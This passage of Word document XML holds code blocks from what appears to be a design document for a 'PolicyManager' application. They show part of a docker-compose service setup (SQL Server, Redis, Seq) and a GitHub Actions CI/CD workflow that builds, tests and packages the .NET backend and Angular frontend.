          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      context: ./frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      dockerfile: Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports: ["80:80", "443:443"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    depends_on: [api]</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db:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: mcr.microsoft.com/mssql/server:2022-latest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ACCEPT_EULA=Y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - SA_PASSWORD=${DB_PASSWORD}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - sqldata:/var/opt/mssql</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redis:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: redis:7-alpine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    command: redis-server --maxmemory 256mb --maxmemory-policy allkeys-lru</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seq:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: datalust/seq:latest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports: ["5341:80"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ACCEPT_EULA=Y</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volumes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  sqldata:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec5-4" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4  GitHub Actions CI/CD Pipeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># .github/workflows/ci-cd.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">name: PolicyManager CI/CD</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on:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  push:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    branches: [main, develop]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  pull_request:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    branches: [main]</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jobs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  test-backend:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    runs-on: ubuntu-latest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - uses: actions/checkout@v4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - uses: actions/setup-dotnet@v4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        with: { dotnet-version: "8.0.x" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - run: dotnet restore backend/PolicyManager.API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - run: dotnet build backend/PolicyManager.API --no-restore</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - run: dotnet test backend/PolicyManager.Tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">               --no-build --collect:"XPlat Code Coverage"</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test-frontend:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    runs-on: ubuntu-latest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - uses: actions/checkout@v4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - uses: actions/setup-node@v4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        with: { node-version: "20" }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - run: npm ci</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        working-directory: frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - run: npx ng test --watch=false --browsers=ChromeHeadless</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        working-directory: frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - run: npx playwright test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        working-directory: frontend</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deploy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    needs: [test-backend, test-frontend]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if: github.ref == "refs/heads/main"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    runs-on: ubuntu-latest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - name: Build &amp; push Docker images</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        run: |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">          docker build -t policymanager-api ./backend/PolicyManager.API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">          docker build -t policymanager-frontend ./frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
